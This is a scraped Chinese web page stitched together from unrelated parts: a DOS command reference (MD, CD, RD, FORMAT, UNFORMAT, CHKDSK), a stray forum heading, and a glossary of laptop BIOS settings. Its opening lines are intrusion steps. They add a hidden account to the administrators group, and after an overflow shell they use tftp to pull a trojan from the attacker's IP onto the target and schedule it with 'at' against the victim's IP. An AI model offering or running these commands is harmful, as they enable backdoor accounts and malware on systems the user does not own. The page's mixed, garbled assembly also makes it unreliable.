net stop 服務名
6)在本地添加帳戶
net user 帳戶名 密碼 /add
7)激活禁用的用戶
net uesr 帳戶名 /active:yes
8)加入管理員組
net localgroup administrators xuliguo /add
tftp -i 你的IP get **.exe c:\winnt\system32\**.exe
m溢出的對方SHELL後在DOS下上傳木馬
tftp -i 自已的IP get ***.exe
time
at \\對方的IP 時間 ***.exe
DOS命令大全
一)MD——建立子目錄
1.功能:創建新的子目錄
2.類型:內部命令
3.格式:MD[盤符:][路徑名]〈子目錄名〉
4.使用說明:
(1)「盤符」:指定要建立子目錄的磁碟驅動器字母,若省略,則為當前驅動器;
(2)「路徑名」:要建立的子目錄的上級目錄名,若預設則建在當前目錄下。
例:(1)在C盤的根目錄下創建名為FOX的子目錄;(2)在FOX子目錄下再創建USER子目錄。
C:、>MD FOX (在當前驅動器C盤下創建子目錄FOX)
C:、>MD FOX 、USER (在FOX 子目錄下再創建USER子目錄)
(二)CD——改變當前目錄
1.功能:顯示當前目錄
2.類型:內部命令
3.格式:CD[盤符:][路徑名][子目錄名]
4.使用說明:
(1)如果省略路徑和子目錄名則顯示當前目錄;
(2)如採用「CD、」格式,則退回到根目錄;
(3)如採用「CD.。」格式則退回到上一級目錄。
例:(1)進入到USER子目錄;(2)從USER子目錄退回到子目錄;(3)返回到根目錄。
C:、>CD FOX 、USER(進入FOX子目錄下的USER子目錄)
C:、FOX、USER>CD.。 (退回上一級根目錄)
C:、FOX>CD、 (返回到根目錄)
C:、>
(三)RD——刪除子目錄命令
1.功能:從指定的磁碟刪除了目錄。
2.類型:內部命令
3.格式:RD[盤符:][路徑名][子目錄名]
4.使用說明:
(1)子目錄在刪除前必須是空的,也就是說需要先進入該子目錄,使用DEL(刪除文件的命令)將其子目錄下的文件刪空,然後再退回到上一級目錄,用RD命令刪除該了目錄本身;
(2)不能刪除根目錄和當前目錄。
例:要求把C盤FOX子目錄下的USER子目錄刪除,操作如下:
第一步:先將USER子目錄下的文件刪空;
C、>DEL C:、FOX、USER、*。*
第二步,刪除USER子目錄。
C、>RD C:、FOX、USER
(四)DIR——顯示磁碟目錄命令
1.功能:顯示磁碟目錄的內容。
2.類型:內部命令
3.格式:DIR [盤符][路徑][/P][/W]
4.
使用說明:/P的使用;當欲查看的目錄太多,無法在一屏顯示完屏幕會一直往上卷,不容易看清,加上/P參數後,屏幕上會分面一次顯示23行的文件信息,然後暫停,並提示;Press
any key to continue
/W的使用:加上/W只顯示文件名,至於文件大小及建立的日期和時間則都省略。加上參數後,每行可以顯示五個文件名。
PATH——路徑設置命令
1.功能:設備可執行文件的搜索路徑,只對文件有效。
2.類型:內部命令
3.格式:PATH[盤符1]目錄[路徑名1]{[;盤符2:],〈目錄路徑名2〉…}
4.使用說明:
(1)當運行一個可執行文件時,DOS會先在當前目錄中搜索該文件,若找到則運行之;若找不到該文件,則根據PATH命令所設置的路徑,順序逐條地到目錄中搜索該文件;
(2)PATH命令中的路徑,若有兩條以上,各路徑之間以一個分號「;」隔開;
(3)PATH命令有三種使用方法:
PATH[盤符1:][路徑1][盤符2:][路徑2]…(設定可執行文件的搜索路徑) PATH:(取消所有路徑)
PATH:(顯示目前所設的路徑)
(六)TREE——顯示磁碟目錄結構命令
1.功能:顯示指定驅動器上所有目錄路徑和這些目錄下的所有文件名。
2.類型:外部命令
3.格式:TREE[盤符:][/F][》PRN]
4.使用說明:
(1)使用/F參數時顯示所有目錄及目錄下的所有文件,省略時,只顯示目錄,不顯示目錄下的文件;
(2)選用>PRN參數時,則把所列目錄及目錄中的文件名列印輸出。
(七)DELTREE——刪除整個目錄命令
1.功能:將整個目錄及其下屬子目錄和文件刪除。
2.類型:外部命令
3.格式:DELTREE[盤符:]〈路徑名〉
4.使用說明:該命令可以一步就將目錄及其下的所有文件、子目錄、更下層的子目錄一並刪除,而且不管文件的屬性為隱藏、系統或只讀,只要該文件位於刪除的目錄之下,DELTREE都一視同仁,照刪不誤。使用時務必小心!!!
五、磁碟操作類命令
(一)formAT——磁碟格式化命令
1.功能:對磁碟進行格式化,劃分磁軌和扇區;同時檢查出整個磁碟上有無帶缺陷的磁軌,對壞道加註標記;建立目錄區和文件分配表,使磁碟作好接收DOS的准備。
2.類型:外部命令
3.格式:formAT〈盤符:〉[/S][/4][/Q]
4.使用說明:
(1)命令後的盤符不可預設,若對硬碟進行格式化,則會如下列提示:WARNING:ALL DATA ON NON
——REMOVABLE DISK
DRIVE C:WILL BE LOST !
Proceed with format (Y/N)?
(警告:所有數據在C盤上,將會丟失,確實要繼續格式化嗎?)
(2)若是對軟盤進行格式化,則會如下提示:Insert mew diskette for drive A;
and press ENTER when ready…
(在A驅中插入新盤,准備好後按回車鍵)。
(3)選用[/S]參數,將把DOS系統文件IO.SYS
、MSDOS.SYS及COMMAND.COM復制到磁碟上,使該磁碟可以做為DOS啟動盤。若不選用/S參數,則格式化後的磙盤只能讀寫信息,而不能做為啟動盤;
(4)選用[/4]參數,在1.2MB的高密度軟碟機中格式化360KB的低密度盤;
(5)選用[/Q]參數,快速格式化,這個參數並不會重新劃分磁碟的磁軌貌岸然和扇區,只能將磁碟根目錄、文件分配表以及引導扇區清成空白,因此,格式化的速度較快。
(6)選用[/U]參數,表示無條件格式化,即破壞原來磁碟上所有數據。不加/U,則為安全格式化,這時先建立一個鏡象文件保存原來的FAT表和根目錄,必要時可用UNFORRMAT恢復原來的數據。
(二)UNformAT恢復格式化命令
1.功能:對進行過格式化誤操作丟失數據的磁碟進行恢復。
2.類型:外部命令
3.格式:UNformAT〈盤符〉[/L][/U][/P][/TEST]
4.使用說明:用於將被「非破壞性」格式化的磁碟恢復。根目錄下被刪除的文件或子目錄及磁碟的系統扇區(包括FAT、根目錄、BOOT扇區及硬碟分區表)受損時,也可以用UNformAT來搶救。
(1)選用/L參數列出找到的子目錄名稱、文件名稱、大孝日期等信息,但不會真的做formAT工作。
(2)選用/P參數將顯示於屏幕的報告(包含/L參數所產生的信息)同時也送到列印機。運行時屏幕會顯示:「Print out will
be sent to LPT1」
(3)選用/TEST參數只做模擬試驗(TEST)不做真正的寫入動作。使用此參數屏幕會顯示:「Simulation only」
(4)選用/U參數不使用MIRROR映像文件的數據,直接根據磁碟現狀進行UNformAT。
(5)選用/PSRTN;修復硬碟分區表。
若在盤符之後加上/P、/L、/TEST之一,都相當於使用了/U參數,UNformAT會「假設」此時磁碟沒有MIRROR映像文件。
注意:UNformAT對於剛formAT的磁碟,可以完全恢復,但formAT後若做了其它數據的寫入,則UNformAT就不能完整的救回數據了。UNformAT並非是萬能的,由於使用UNformAT會重建FAT與根目錄,所以它也具有較高的危險性,操作不當可能會擴大損失,如果僅誤刪了幾個文件或子目錄,只需要利用UNDELETE就夠了。
三) CHKDSK——檢查磁碟當前狀態命令
1.功能:顯示磁碟狀態、內存狀態和指定路徑下指定文件的不連續數目。
2.類型:外部命令
3.格式:CHKDSK [盤符:][路徑][文件名][/F][/V]
4.使用說明:
(1)選用[文件名]參數,則顯示該文件佔用磁碟的情況;
(2)選[/F]參數,糾正在指定磁碟上發現的邏輯錯誤;
(3)選用[/V]參數,顯示盤上的所有文件和路徑。
(四)DISKCOPY——整盤復制命令
1.功能:復制格式和內容完全相同的軟盤。
2.類型:外部命令
3.格式:DISKCOPY[盤符1:][盤符2:]
4.使用說明:
(1)如果目標軟盤沒有格式化,則復制時
⑷ 電腦高手或英語高手請進~~~~~!
BIOS常見中英對照表英(比較全面的)
Time/System Time 時間/系統時間
Date/System Date 日期/系統日期
Level 2 Cache 二級緩存
System Memory 系統記憶體
Video Controller 視頻控制器
Pane Type 液晶屏型號
Audio Controller 音頻控制器
Modem Controller 數據機(Modem)
Primary Hard Drive 主硬碟
Molar Bay 模組托架
Service Tag 服務標簽
Asset Tag 資產標簽
BIOS Version BIOS版本
Boot Order/Boot Sequence 啟動順序(系統搜索作業系統檔的順序)
Diskette Drive 軟碟驅動器
Internal HDD 內置硬碟驅動器
Floppy device 軟盤機設備
Hard-Disk Drive 硬碟驅動器
USB Storage Device USB存儲設備
CD/DVD/CD-RW Drive 光碟機
CD-ROM device 光碟機
Molar Bay HDD 模組化硬碟驅動器
Cardbus NIC Cardbus 匯流排網卡
Onboard NIC 板載網卡
Boot POST
進行開機自檢時(POST)硬體檢查的水平:設置為「MINIMAL」(默認設置)則開機自檢僅在BIOS升級,
記憶體模組更改或前一次開機自檢未完成的情況下才進行檢查。
設置為「THOROUGH」則開機自檢時執行全套硬體檢查。
Config Warnings
警告設置:該選項用來設置在系統使用較低電壓的電源適配器或其他不支援的配置時是否報警,
設置為「DISABLED」禁用報警,設置為「ENABLED」啟用報警
Internal Modem
內置數據機:使用該選項可啟用或禁用內置Modem。禁用(disabled)後Modem在作業系統中不可見。
LAN Controller
網路控制器:使用該選項可啟用或禁用PCI乙太網控制器。禁用後該設備在作業系統中不可見。
PXE BIS Policy/PXE BIS Default Policy
PXE BIS策略:該選項控制系統在沒有認證時如何處理
(啟動整體服務Boot Integrity Services(BIS))授權請求。
系統可以接受或拒絕BIS請求。設置為「Reset」時,在下次啟動電腦時BIS將重新初始化並設置為「Deny」。
Onboard Bluetooth 板載藍牙設備
MiniPCI Device Mini PCI設備
MiniPCI Status
Mini PCI設備狀態:在安裝Mini PCI設備時可以使用該選項啟用或禁用板載PCI設備
Wireless Control
無線控制:使用該選項可以設置MiniPCI和藍牙無線設備的控制方式。
設置為「Application」時無線設備可以通過「Quickset」等應用程式啟用或禁用,熱鍵不可用。
設置為「/Application」時無線設備可以通過「Quickset」等應用程式或熱鍵啟用或禁用。
設置為「Always Off」時無線設備被禁用,並且不能在作業系統中啟用。
Wireless
無線設備:使用該選項啟用或禁用無線設備。
該設置可以在作業系統中通過「Quickset」或「」熱鍵更改。
該設置是否可用取決於「Wireless Control」的設置。
Serial Port
串口:該選項可以通過重新分配埠位址或禁用埠來避免設備資源沖突。
Infrared Data Port
紅外數據埠。使用該設置可以通過重新分配埠位址或禁用埠來避免設備資源沖突。
Parallel Mode
並口模式。控制電腦並口工作方式為「NORMAL」(AT相容)(普通標准並行口)、「BI-DIRECTIONAL」,
(PS/2相容)(雙向模式,允許主機和外設雙向通訊)
還是「ECP」(Extended Capabilities Ports,擴展功能埠)(默認)。
Num Lock.
數碼鎖定。設置在系統啟動時數碼燈(NumLock LED)是否點亮。設為「DISABLE」則數碼燈保持滅,
設為「ENABLE」則在系統啟動時點亮數碼燈。
Keyboard NumLock
鍵盤數碼鎖:該選項用來設置在系統啟動時是否提示鍵盤相關的錯誤資訊。
Enable Keypad
啟用小鍵盤:設置為「BY NUMLOCK」在NumLock燈亮並且沒有接外接鍵盤時啟用數位小鍵盤。
設置為「Only By Key」在NumLock燈亮時保持embedded鍵區為禁用狀態。
External Hot Key
外部熱鍵:該設置可以在外接PS/2鍵盤上按照與使用筆記本電腦上的鍵的相同的方式使用鍵。
如果您使用ACPI作業系統,如Win2000或WinXP,則USB鍵盤不能使用鍵。
僅在純DOS模式下USB鍵盤才可以使用鍵。
設置為「SCROLL LOCK」(默認選項)啟用該功能,設置為「NOT INSTALLED」禁用該功能。
USB Emulation
USB模擬:使用該選項可以在不直接支援USB的作業系統中使用USB鍵盤、USB滑鼠及USB軟盤機。
該設置在BIOS啟動過程中自動啟用。啟用該功能後,控制轉移到作業系統時模擬繼續有效。
禁用該功能後在控制轉移到作業系統時模擬關閉。
Pointing Device
指標設備:設置為「SERIAL MOUSE」時外接串口滑鼠啟用並集成觸摸板被禁用。
設置為「PS/2 MOUSE」時,若外接PS/2滑鼠,則禁用集成觸摸板。
設置為「TOUCH PAD-PS/2 MOUSE」(默認設置)時,若外接PS/2滑鼠,可以在滑鼠與觸摸板間切換。
更改在電腦重新啟動後生效
Video Expansion
視頻擴展:使用該選項可以啟用或禁用視頻擴展,將較低的解析度調整為較高的、正常的LCD解析度。
Battery 電池
Battery Status 電池狀態
Power Management 電源管理
Suspend Mode 掛起模式
AC Power Recovery
交流電源恢復:該選項可以在交流電源適配器重新插回系統時電腦的相應反映。
Low Power Mode
低電量模式:該選項用來設置系統休眠或關閉時所用電量。
Brightnessg
亮度:該選項可以設置電腦啟動時顯示器的亮度。
計算機工作在電源供電狀態下時默認設置為一半。
計算機工作在交流電源適配器供電狀態下時默認設置為最大。
Wakeup On LAN
網路喚醒:該選項設置允許在網路信號接入時將電腦從休眠狀態喚醒。
該設置對待機狀態(Standby state)無效。只能在作業系統中喚醒待機狀態
該設置僅在接有交流電源適配器時有效。
Auto On Mod
自動開機模式:注意若交流電源適配器沒有接好,該設置將無法生效。
該選項可設置電腦自動開機時間,可以設置將電腦每天自動開機或僅在工作日自動開機。
設置在電腦重新啟動後生效。
Auto On Time
自動開機時間:該選項可設置系統自動開機的時間,時間格式為24小時制。
鍵入數值或使用左、右箭頭鍵設定數值。設置在電腦重新啟動後生效。
Dock Configuration 塢站配置
Docking Status 塢站狀態
Universal Connect
通用介面:若所用作業系統為WinNT4.0或更早版本,該設置無效。
如果經常使用不止一個戴爾塢站設備,並且希望最小化接入塢站時的初始時間,
設置為「ENABLED」(默認設置)。
如果希望作業系統對電腦連接的每個新的塢站設備都生成新的系統設置檔,設置為「DISABLED」。
System Security 系統安全
Primary Password 主密碼
Admin Password 管理密碼
Hard-disk drive password(s) 硬碟驅動器密碼
Password Status
密碼狀態:該選項用來在Setup密碼啟用時鎖定系統密碼。
將該選項設置為「Locked」並啟用Setup密碼以放置系統密碼被更改。
該選項還可以用來放置在系統啟動時密碼被用戶禁用
System Password 系統密碼
Setup Password Setup密碼
Post Hotkeys
自檢熱鍵:該選項用來指定在開機自檢(POST)時螢幕上顯示的熱鍵(F2或F12)。 Chassis Intrusions
機箱防盜:該選項用來啟用或禁用機箱防盜檢測特徵。
設置為「Enable-Silent」時,啟動時若檢測到底盤入侵,不發送警告資訊。
該選項啟用並且機箱蓋板打開時,該域將顯示「DETECTED」。 Drive Configuration 驅動器設置
Diskette Drive A:
磁碟機A:如果系統中裝有軟盤機,使用該選項可啟用或禁用軟碟驅動器
Prmary Master Drive 第一主驅動器
Primary Slave Drive 第一從驅動器
Secondary Master Drive 第二主驅動器
Secondary Slave Drive 第二從驅動器
IDE Drive UDMA
支援UDMA的IDE驅動器:使用該選項可以啟用或禁用通過內部IDE硬碟介面的DMA傳輸。
Hard-Disk drive Sequence 硬碟驅動器順序
System BIOS boot devices 系統BIOS啟動順序
USB device USB設備
Memory Information 記憶體資訊
Installed System Memory
系統記憶體:該選項顯示系統中所裝記憶體的大小及型號
System Memory Speed
記憶體速率:該選項顯示所裝記憶體的速率
System Memory Channel Mode
記憶體通道模式:該選項顯示記憶體槽設置。
AGP Aperture
AGP區域記憶體容量:該選項指定了分配給視頻適配器的記憶體值。
某些視頻適配器可能要求多於預設值的記憶體量。
CPU information CPU信息
CPU Speed
CPU速率:該選項顯示啟動後中央處理器的運行速率
Bus Speed
匯流排速率:顯示處理器匯流排速率
Processor 0 ID
處理器ID:顯示處理器所屬種類及模型號
Clock Speed 時鍾頻率
Cache Size
緩存值:顯示處理器的二級緩存值
Integrated Devices(LegacySelect Options) 集成設備
Soundv
聲音設置:使用該選項可啟用或禁用音頻控制器
Network Interface Controller
網路介面控制器:啟用或禁用集成網卡
Mouse Port
滑鼠埠:使用該選項可啟用或禁用內置PS/2相容滑鼠控制器
USB Controller
USB控制器:使用該選項可啟用或禁用板載USB控制器。
PCI Slots
PCI槽:使用該選項可啟用或禁用板載PCI卡槽。
禁用時所有PCI插卡都不可用,並且不能被作業系統檢測到。
Serial Port 1
串口1:使用該選項可控制內置串口的操作。
設置為「AUTO」時,如果通過串口擴展卡在同一個埠位址上使用了兩個設備,
內置串口自動重新分配可用埠位址。
串口先使用COM1,再使用COM2,如果兩個位址都已經分配給某個埠,該埠將被禁用。
Parallel Port
並口:該域中可配置內置並口MODE
模式:設置為「AT」時內置並口僅能輸出資料到相連設備。
設置為PS/2、EPP或ECP模式時並口可以輸入、輸出資料.
這三種模式所用協定和最大資料傳輸率不同。最大傳輸速率PS/2